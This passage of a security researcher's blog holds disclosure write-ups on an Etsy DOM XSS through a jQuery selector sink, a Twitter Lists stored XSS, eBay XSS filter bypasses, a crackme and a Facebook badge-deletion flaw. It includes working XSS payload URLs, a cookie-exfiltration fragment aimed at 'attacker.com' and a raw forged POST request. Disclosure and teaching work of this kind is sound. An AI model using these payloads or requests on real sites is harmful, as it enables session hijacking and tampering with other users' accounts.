http://site.com/help/2643<span style="color: orange;">#/</span><strong>PAYLOAD</strong>/1<br />
<br />
<strong><span style="color: #e69138;">So once the search string starts with a forward slash "/", the condition matches, the system considers this a legitimate safe search, and the filter replaces any payload with NULL and then passes the <u>filtered</u> payload to a vulnerable jQuery function.</span></strong><br />
<br />
Remember! This is a DOM event that executes jQuery!<br />
<br />
So what had to be done was:<br />
<strong><span style="color: #e69138;">1. Insert a forward slash into the global URI (before the hash sign).</span></strong><br />
<span style="color: #e69138;"><br /></span><br />
<strong><span style="color: #e69138;">2. Then insert the payload into the client-side-only URI (right after the hash sign, without a slash).</span></strong><br />
<br />
Logic flow vulnerability:<br />
This way I managed to trick the system into passing the forward-slash condition and cause the filter to fail, stepping over the regex to the next stage of <b>passing my payload directly into the vulnerable jQuery function!</b><br />
<br />
Final payload:<br />
http://site.com/help/2643<span style="color: orange;">/#&lt;img src=1 onerror=javascript:alert('EXPLOITABLE!')&gt;</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoK-Ea1KQ0xnRP4levlEi6WOIwODaVC0hQZawugSGPM621Fx0xJdz3h7TL0SWiyRJ60RdcIJ3nrZqwI5hyphenhyphenBqofuvXoCpr2JsNfJfvUwvYNFCitz9XFl5HD4E6Bkt8Rw6I20wGOKc5k-L8/s1600/etsy-DOM.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoK-Ea1KQ0xnRP4levlEi6WOIwODaVC0hQZawugSGPM621Fx0xJdz3h7TL0SWiyRJ60RdcIJ3nrZqwI5hyphenhyphenBqofuvXoCpr2JsNfJfvUwvYNFCitz9XFl5HD4E6Bkt8Rw6I20wGOKc5k-L8/s320/etsy-DOM.PNG" width="320" /></a></div>
<br /></div>
</div>
</span><br />
<div style="direction: ltr;">
<div style="direction: ltr;">
</div>
</div>
</div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<div style="direction: ltr;">
<span style="font-family: Arial, Helvetica, sans-serif;">But why is this vulnerable?</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div style="direction: ltr;">
<div style="direction: ltr;">
<h3>
<span style="color: #999999; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">Vulnerable DOM XSS code - jQuery (line 10):</span></h3>
</div>
</div>
<br class="Apple-interchange-newline" /></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<div style="background: black; color: white; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<table><tbody>
<tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28</pre>
</td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #d0d0d0;">(</span><span style="color: #6ab825; font-weight: bold;">function</span><span style="color: #d0d0d0;">(){</span>
<span style="color: #d0d0d0;">o=$(</span><span style="color: #ed9d13;">"#attachment-shim"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">k=$(</span><span style="color: #ed9d13;">"#file-form"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">var</span> <span style="color: #d0d0d0;">a=</span><span style="color: #ed9d13;">"iframe"</span><span style="color: #d0d0d0;">+(</span><span style="color: #6ab825; font-weight: bold;">new</span> <span style="color: #24909d;">Date</span><span style="color: #d0d0d0;">).getTime();</span>
<span style="color: #d0d0d0;">g=$(</span><span style="color: #ed9d13;">'&lt;iframe id="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'" name="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'" /&gt;'</span><span style="color: #d0d0d0;">).hide();</span><span style="color: #999999; font-style: italic;">//&lt;iframe id="iframe1334892619493" name="iframe1334892619493" /&gt;</span>
<span style="color: #d0d0d0;">k.attr(</span><span style="color: #ed9d13;">"target"</span><span style="color: #d0d0d0;">,a).after(g);</span>
<span style="color: #d0d0d0;">o.bind(</span><span style="color: #ed9d13;">"change"</span><span style="color: #d0d0d0;">,q);</span>
<span style="color: #6ab825; font-weight: bold;">if</span><span style="color: #d0d0d0;">(a=</span><span style="color: #24909d;">window</span><span style="color: #d0d0d0;">.location.hash.substring(</span><span style="color: #3677a9;">1</span><span style="color: #d0d0d0;">))</span> <span style="color: #999999; font-style: italic;">// sets a to "&lt;img src=1 onerror=javascript:alert(1)&gt;"</span>
<span style="color: #6ab825; font-weight: bold;">if</span><span style="color: #d0d0d0;">($(</span><span style="color: #ed9d13;">'a[name|="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'"]'</span><span style="color: #d0d0d0;">)[</span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">])</span> <span style="color: #d0d0d0;">{</span> <span style="color: #999999; font-style: italic;">// GAME OVER, we got our executor: "a[name|=\"&lt;img src=1 onerror=javascript:alert(1)&gt;\"]" (later parsed by jQuery in " for(s.innerHTML=m[1]+l+m[2];o--;) ")</span>
<span style="color: #d0d0d0;">a=$(</span><span style="color: #ed9d13;">'a[name|="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'"]'</span><span style="color: #d0d0d0;">).parents(</span><span style="color: #ed9d13;">"div.topic"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">a.find(</span><span style="color: #ed9d13;">"ol span"</span><span style="color: #d0d0d0;">).removeClass(</span><span style="color: #ed9d13;">"bottom"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">a.find(</span><span style="color: #ed9d13;">".view-less"</span><span style="color: #d0d0d0;">).show();</span>
<span style="color: #d0d0d0;">a.find(</span><span style="color: #ed9d13;">".view-all"</span><span style="color: #d0d0d0;">).hide()</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #6ab825; font-weight: bold;">else</span> <span style="color: #d0d0d0;">m();</span>
<span style="color: #d0d0d0;">f=</span><span style="color: #6ab825; font-weight: bold;">true</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">topic_box=</span>
<span style="color: #d0d0d0;">$(</span><span style="color: #ed9d13;">"#topic"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">topic_box_val=topic_box.val();</span>
<span style="color: #6ab825; font-weight: bold;">if</span><span style="color: #d0d0d0;">(topic_box_val!=</span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">||$(</span><span style="color: #ed9d13;">"#message"</span><span style="color: #d0d0d0;">).val()!=</span><span style="color: #ed9d13;">""</span><span style="color: #d0d0d0;">){</span>
<span style="color: #d0d0d0;">d=</span><span style="color: #6ab825; font-weight: bold;">true</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">h=topic_box_val;</span>
<span style="color: #d0d0d0;">n()</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #d0d0d0;">})()</span>
<span style="color: #d0d0d0;">});</span>
</pre>
</td></tr>
</tbody></table>
</div>
</div>
<div style="direction: ltr; font-family: Arial, Helvetica, sans-serif;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; margin: 0cm 0cm 0pt; text-align: left; unicode-bidi: embed;">
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Inside this "if" condition (line 10) there is a call to a vulnerable jQuery function:</span></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<pre style="background-color: black; font-family: Arial, Helvetica, sans-serif; line-height: 16px; text-align: -webkit-auto;"><span style="color: #6ab825; font-weight: bold;">if</span><span style="color: #d0d0d0;">($(</span><span style="color: #ed9d13;">'a[name|="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'"]'</span><span style="color: #d0d0d0;">)[</span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">])</span></pre>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
which executes a function in the jQuery code that includes the following line:</div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
for(s.<b><span style="color: orange;">innerHTML</span></b>=m[1]+<b><span style="color: orange;">l</span></b>+m[2];o--;)
</div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
After bypassing all of these conditions, our payload is stored in the "l" variable like this:</div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
l = "&lt;img src=1 onerror=javascript:alert('DOM XSS')&gt;"</div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
and, as a result of the for loop, it is injected into the innerHTML of the page, triggering the XSS.<br />
<br /></div>
<div class="MsoNormal" dir="LTR" style="direction: ltr; font-family: Arial, Helvetica, sans-serif; line-height: normal; unicode-bidi: embed;">
After I reported it, I noticed that (I never knew this before) there seems to be an open ticket in the jQuery bug tracker.</div>
<div class="MsoNormal" dir="LTR" style="direction: ltr; font-family: Arial, Helvetica, sans-serif; line-height: normal; unicode-bidi: embed;">
Reference: <a href="http://bugs.jquery.com/ticket/9521">http://bugs.jquery.com/ticket/9521</a></div>
<div class="MsoNormal" dir="LTR" style="direction: ltr; font-family: Arial, Helvetica, sans-serif; line-height: normal; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" dir="LTR" style="direction: ltr; font-family: Arial, Helvetica, sans-serif; line-height: normal; unicode-bidi: embed;">
</div>
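<p>As an added example (not code from this post, from Etsy or from jQuery), the following Node script models the check jQuery 1.7.x applied to decide whether the string handed to $() is HTML or a selector, using the quickExpr regex as shipped in jQuery 1.7.2, and shows why concatenating location.hash into the a[name|="..."] selector reached innerHTML. The stricter "must begin with &lt;" rule and the allow-list validation are assumptions added for contrast: the first is modeled on later jQuery releases (the exact regex is not taken from a release), the second is a hardening suggestion, not Etsy's fix.</p>

```javascript
// Added example: models jQuery's "HTML or selector?" decision for the sink
// $('a[name|="' + location.hash.substring(1) + '"]'). Not Etsy's or jQuery's code.

// quickExpr as shipped in jQuery 1.7.2: a string is treated as HTML when it contains
// "<...>" anywhere after a prefix free of "#" and "<". Group 1 = HTML, group 2 = "#id".
// (The 1.7 change for ticket 9521 only added "#" to the excluded prefix characters,
// which does not help a string that starts with "a[name|=".)
const QUICK_EXPR_1_7_2 = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;

// Assumption: later jQuery releases treat a string as HTML only when it BEGINS with "<"
// (optionally after whitespace). This regex models that rule, not a specific release.
const QUICK_EXPR_STRICT = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/;

// Constructed allow-list for a fragment that is supposed to name an anchor: letters,
// digits, "_" and "-" only, so no quote, "<" or "]" can ever reach the selector string.
const SAFE_ANCHOR_NAME = /^[A-Za-z0-9_-]{1,64}$/;

// Sample input: the payload quoted in the post, and a benign fragment (both constructed).
const PAYLOAD_HASH = "#<img src=1 onerror=javascript:alert('DOM XSS')>";
const BENIGN_HASH = "#topic-42";

// Classify a string the way $(str) routes it: "html" goes to jQuery.clean(), which is
// where the innerHTML assignment quoted above lives; "id" to getElementById;
// "selector" to the Sizzle selector engine.
function classifyJQueryArg(str, quickExpr) {
  const m = quickExpr.exec(str);
  if (m && m[1]) return "html";
  if (m && m[2] !== undefined) return "id";
  return "selector";
}

// Mirrors the vulnerable line: a = window.location.hash.substring(1), selector built by
// concatenation. With validate:true, anything outside the allow-list is rejected (null)
// before it can be concatenated, so no hash-controlled "<" reaches $().
function buildAnchorSelector(hash, opts = {}) {
  const a = hash.startsWith("#") ? hash.slice(1) : hash;
  if (opts.validate && !SAFE_ANCHOR_NAME.test(a)) return null;
  return 'a[name|="' + a + '"]';
}

// Walks one fragment through the original code path and the hardened one and reports
// where the resulting string would be routed.
function analyzeFragment(hash) {
  const raw = buildAnchorSelector(hash);
  const validated = buildAnchorSelector(hash, { validate: true });
  return {
    selector: raw,
    route_1_7_2: classifyJQueryArg(raw, QUICK_EXPR_1_7_2),
    route_strict: classifyJQueryArg(raw, QUICK_EXPR_STRICT),
    accepted_by_allowlist: validated !== null,
  };
}

for (const h of [PAYLOAD_HASH, BENIGN_HASH]) {
  console.log(JSON.stringify(analyzeFragment(h), null, 2));
}
```

For the payload fragment the 1.7.2 rule routes the concatenated selector to the HTML path (so the markup is written via innerHTML and the onerror handler runs), while the strict rule keeps it a selector and the allow-list rejects it before concatenation.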
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal; text-align: -webkit-auto;">
<span style="font-family: Arial;">Final conclusions again:</span><span style="font-family: Arial;"><br />1. First conclusion (easy): the main JavaScript layer loads a second dynamic block (covered).<span style="color: red;"><br /></span></span></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal; text-align: -webkit-auto;">
<span style="font-family: Arial;">2. The payload goes through the dynamic code block and, inside it, passes through a filter meant to prevent DOM XSS (appears as self-only) (covered).</span></div>
<div style="text-align: -webkit-auto;">
<span style="color: orange; font-family: Arial;"><span style="font-family: Arial, Helvetica, sans-serif;">3. The layer-2 code block loads another layer (3), this time jQuery, and then executes a function that is vulnerable to DOM XSS (latest version 1.72 and older versions as well) (covered).</span></span></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">It is always fun when web applications are open to vulnerability reports, allowing me to research these very interesting security flaws that require combining all the pieces together.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Thank you Etsy!</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Etsy thank-you list: </span><a href="http://www.etsy.com/help/article/2463">http://www.etsy.com/help/article/2463</a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<h1>Twitter Vulnerability Potential XSS Worm!!! another hero?</h1>
<p>[Ben Hayak], published 2012-05-08T22:02:00.002+03:00, updated 2012-05-08T22:11:29.842+03:00</p>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Twitter is one of the leading social networking and information sharing systems these days.</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">I have recently discovered (and reported) an XSS vulnerability that, if not reported, could lead to something similar to "HyHack is my hero" ;).</span><br />
<br />
<span style="font-family: Arial;">For those of you who did not know, Twitter implemented a feature called <strong>"Lists"</strong>. This feature gives <strong><span style="color: red;">any user the ability to add anyone</span>, without any terms or relation to the "follow" mechanism</strong> (they don't have to follow the attacker and vice versa)*, <strong>to his malicious XSSed list.</strong></span><br />
<br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The reason this is such a high-risk stored XSS vulnerability is that the attack is potentially triggered on <strong>anyone who viewed the attacker's profile "Lists" <u>using a mobile</u>.</strong> After a victim got infected, the attack triggers again and infects anyone who views the victim's <strong>"Lists"</strong>, and anybody who views theirs, and so on... (only victims using a mobile will get infected! Reminds you of something?)</span><br />
<br />
<span style="font-family: Arial; font-size: x-small;">*I did not test whether a user can add protected (locked) people to his lists. Any comment on this will be appreciated.</span><br />
<br />
<span style="font-family: Arial;">PoC picture, viewing the victim's profile:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbGfvWgXUCcyNGjyMZ5Fk84w3ddss1pEIH7381FAqkTevaxlBHLN6rYgZIdGcO60D0oshUYVJhB1JqZM_eonxnVHqmOHvpFZy3QU3g02pKc0we-ttxbd63lvYqDnKHYupDxUntGCQoZXg/s1600/IMG_0803.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbGfvWgXUCcyNGjyMZ5Fk84w3ddss1pEIH7381FAqkTevaxlBHLN6rYgZIdGcO60D0oshUYVJhB1JqZM_eonxnVHqmOHvpFZy3QU3g02pKc0we-ttxbd63lvYqDnKHYupDxUntGCQoZXg/s320/IMG_0803.PNG" width="212" /></a></div>
</div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<span style="font-family: Arial;">The effect of this XSS is <u>ONLY</u> on victims that use Twitter on mobile!</span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<span style="font-family: Arial; font-size: x-small;">I must say the Lists feature was not fully implemented in the browser at the time I was testing, so most of my testing was performed on the "Me" tab.</span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<span style="font-family: Arial;">Twitter did a great job resolving this vulnerability very quickly (~a day after my report), and placed my name on the Twitter Security Whitehats page (2012) later on.</span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<span style="font-family: Arial;">I would like to thank Twitter for their work and for giving me the opportunity to make a responsible disclosure and help keep Twitter users safe.</span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
</div>
<h1>eBay Security 2011 &amp; 2012 Wide Security Vulnerabilities</h1>
<p>[Ben Hayak], published 2012-05-06T14:46:00.002+03:00, updated 2012-05-07T14:03:46.186+03:00</p>
<span style="font-family: Verdana, sans-serif; font-size: large;">eBay has different websites for different countries. As a result of a wrong implementation of a common feature across eBay websites, I discovered a wide vulnerability that makes all of eBay's users vulnerable and at risk of being hacked!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="color: orange;"><span style="font-family: Verdana, sans-serif;"><u><span style="font-size: large;">2012 - XSS Wide Vulnerability</span></u> </span></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">The payload was injected into a script tag,</span><br />
<span style="font-family: Verdana, sans-serif;">bypassing browsers' anti-XSS filters, with the ability of full session hijacking and </span><br />
<span style="font-family: Verdana, sans-serif;">hacking into eBay users' accounts.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW0HEv-fMRQveWU9NTImRg1EeJpM3CM6rTceR6G3KlOunubhcVzaBLfT-7lAfY8U1qSKINFq2ZYnqSY9DFiUdVKkeTISGKUAU64o7nPaBgXZJhSINS5birfIDDg09NtzqLXFTDeDlBedQ/s1600/XSS-2012-ForBlog.PNG" target="_new" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW0HEv-fMRQveWU9NTImRg1EeJpM3CM6rTceR6G3KlOunubhcVzaBLfT-7lAfY8U1qSKINFq2ZYnqSY9DFiUdVKkeTISGKUAU64o7nPaBgXZJhSINS5birfIDDg09NtzqLXFTDeDlBedQ/s320/XSS-2012-ForBlog.PNG" width="320" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">This time eBay did a great job fixing this vulnerability.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="color: orange; font-family: Verdana, sans-serif; font-size: large;"><u>2011 - Vulnerability in all eBay Stores</u></span><br />
<span style="font-family: Verdana, sans-serif;">In 2011 I discovered a vulnerability which was quite simple to exploit, since user input passed through a character blacklist which, until my report, did not sanitize input correctly.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3bkJOg0TqBcYzVdrKT9fK32GI8-NB0gyhxQgdf1XyGFI3bCH0PXpIrCvHoWpL_R2lAdZZoZHex3CIzjL9-RGil7xqQeJsPl9EcBmmkwJoVQB3ZXDyE98x8T3X0UpHjHXCMRKbFeELbfg/s1600/xss-ebay.jpg" target="_new" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3bkJOg0TqBcYzVdrKT9fK32GI8-NB0gyhxQgdf1XyGFI3bCH0PXpIrCvHoWpL_R2lAdZZoZHex3CIzjL9-RGil7xqQeJsPl9EcBmmkwJoVQB3ZXDyE98x8T3X0UpHjHXCMRKbFeELbfg/s320/xss-ebay.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<span style="font-size: large;"><span style="font-family: Verdana, sans-serif;"><u>2011 - Interesting Wrong Fix -</u></span></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="color: orange; font-family: Verdana, sans-serif; font-size: large;">Bypass: Single Parameter Splitting Injection XSS (alert isn't the goal!) </span><span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">After my report to the manager of eBay's security team, eBay came up with a fix.</span><br />
<span style="font-family: Verdana, sans-serif;">This fix contained a server-side update to the character blacklist: this time they made it replace the "plus (+) (%2B)" sign and occurrences of "double slash (//)" with nothing (""), in addition to the filtering of "brackets (&lt;&gt;)", limiting the <strong>parameter's allowed length</strong> and other forbidden characters.</span><span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">So, alert? prompt? Could you steal a cookie with alert? Can you do it without generating a request to your domain?</span><br />
<span style="font-family: Verdana, sans-serif;">A request to the attacker's web listener would normally (there are some techniques to evade that; this bypass comes to show how to deal with a normal, real situation) require the use of a double slash, a "plus" sign and a long payload, i.e. 'http:<b style="color: red;">//</b>attacker.com/?s='<b><span style="color: red;">+</span></b>document.____ so it may seem like a partial but anti-session-hijacking fix.</span><br />
<span style="font-family: Verdana, sans-serif;">After working on this filtering I came up with a modified payload which could be used to bypass the filtering and generate requests to an attacker's website carrying the user's sensitive web elements/objects (including the cookie!), then I made a video of full session hijacking.</span><br />
<span style="font-family: Verdana, sans-serif;">The reason I am posting about this issue is the interesting vector of my bypass.</span><br />
<span style="font-family: Verdana, sans-serif;">Enjoy watching:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='425' height='344' src='https://www.youtube.com/embed/2lUcNqjAFUc?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<span style="font-family: Verdana, sans-serif;">eBay did and is still doing a great job, as they take great care of security; I thank them for that.</span><br />
<span style="font-family: Verdana, sans-serif;">I am pleased I could help eBay's security team make eBay's users and customers a bit more secure.</span><span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">For all of my reports (2011-2012) and security assistance to eBay, eBay gave their special appreciation ;)</span>
<h1>Uncrackable? - Exceptional Cracking</h1>
<p>[Ben Hayak], published 2011-08-25T12:15:00.010+03:00, updated 2012-04-22T14:23:25.941+03:00</p>
<div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;">Okay, I've been waiting for a long time for a case worth posting on my blog. I ran into this one during a search for much less interesting, standard challenges for teaching newbies the basics of RE. </div><div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;">This one is a bit beyond what you guys are used to, and I really want you to give it a try before you read this. If you crack it quickly then don't bother reading; if you already have 3 letters of the serial and you're stuck, you should start reading from phrase F.<br />
<br />
I won't teach you how to use a debugger or how to trace the relevant RE chunk of code; there are tons of tutorials that do just that. You should consider this a case study: what's interesting is the case itself, and my focus will be accordingly.<br />
Background: <br />
One of the reasons I chose this crackme is that it "forces" you to focus on discovering the serial itself and not just 'patch & trash', which is a waste of time; additionally, the serial discovery is special.<br />
Goal: <br />
The goal is to find the serial key. I'll show the entire process, including the method I used and why I chose to use that method, and I'll hand over the correct serial.</div><div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;"><b>CrackMe Download Mirrors:</b></div><div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;"><a href="http://c0rk.org/files/crackmes/CrackMe%201.0%20by%20DCrack-FOFF.rar" target="_blank">Mirror 1</a></div><div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;"><a href="http://www.mediafire.com/?cte11imqmcz#1" target="_blank">Mirror 2</a><br />
<span class="Apple-style-span" style="font-family: Calibri, sans-serif;"><span class="Apple-style-span" style="font-size: 15px; line-height: 17px;"><br />
</span></span><br />
<a href="https://sites.google.com/site/benhayakupload/ExceptionalCracking-FOFFCrackMebyBenHayak.pdf?attredirects=0" target="_blank">Download the Full PDF Article</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://sites.google.com/site/benhayakupload/ExceptionalCracking-FOFFCrackMebyBenHayak.pdf?attredirects=0" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVUnEdv3_8phkyRV-3RFV-gij0pTw4wtpc4D0dMreAe6NpE_mFFqaQL5nHyBIotr1QuJLEDq0pU2SX_KcH22swLDmVUjplQhtaI0z9bQUWHc44yJzthyphenhyphen5uw6HipLi4E4ZB5ErxIRtA7LY/s400/background.jpg" width="400" /></a></div><br />
</div>
<h1>Facebook Vulnerability - Destroy Any advertisements/badges! (permission issue)</h1>
<p>[Ben Hayak], published 2011-04-08T14:13:00.013+03:00, updated 2014-06-01T13:18:29.128+03:00</p>
<div style="direction: ltr;">
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">These days Facebook is one of the heaviest engines of advertising; many companies use Facebook </span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">to promote their products and even hire people to deal just with that.</span></div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">I found an attack vector that can be used by any hacker to delete badges/ads from people's or companies' accounts, which will cause damage to every blog or other website embedding them, </span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">because a new badge will have a new "bid", so every website will drop the old badge.</span><br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
This issue affects the Badges feature </div>
</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
</div>
</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Namely: </div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Badges Home</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Profile Badges</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Like Badges</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Photo Badges</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Page Badges</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Vulnerability Details:</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
A user uses the Badges feature to share on Blogger or any other place;</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
an attacker sees the badge on some website/blog:</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<img src="http://badge.facebook.<wbr></wbr>com/badge/<b><span class="Apple-style-span" style="color: red;">1403380007</span></b>.<b><span class="Apple-style-span" style="color: red;">3098</span></b>.<wbr></wbr>1711802846.png" width="336" height="84" style="border: 0px;"></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Analyzing the picture's name:</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
The first number, 1403380007, is the victim's Facebook owner ID</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
(it's easy to get this ID using a simple search on Facebook).</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
The middle number, 3098, is the bid (badge ID).</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Now what the attacker needs to do is capture a badge-deletion request</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
and manipulate the "bid" and "owner_id":</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px; width: 100%;">
POST /ajax/facebook-widgets/delete_badge.php?__a=1 HTTP/1.1<br />
Host: www.facebook.com<br />
Proxy-Connection: keep-alive<br />
Referer: http://www.facebook.com/badges/profile.php?status=new<br />
Origin: http://www.facebook.com<br />
X-SVN-Rev: 349667<br />
Content-Type: application/x-www-form-urlencoded<br />
Accept: */*<br />
User-Agent: Mozilla/5.0 ....<br />
Accept-Encoding: gzip,deflate,sdch<br />
Accept-Language: en-US,en;q=0.8<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3<br />
Cookie: mycookie<br />
Content-Length: 137<br />
<br />
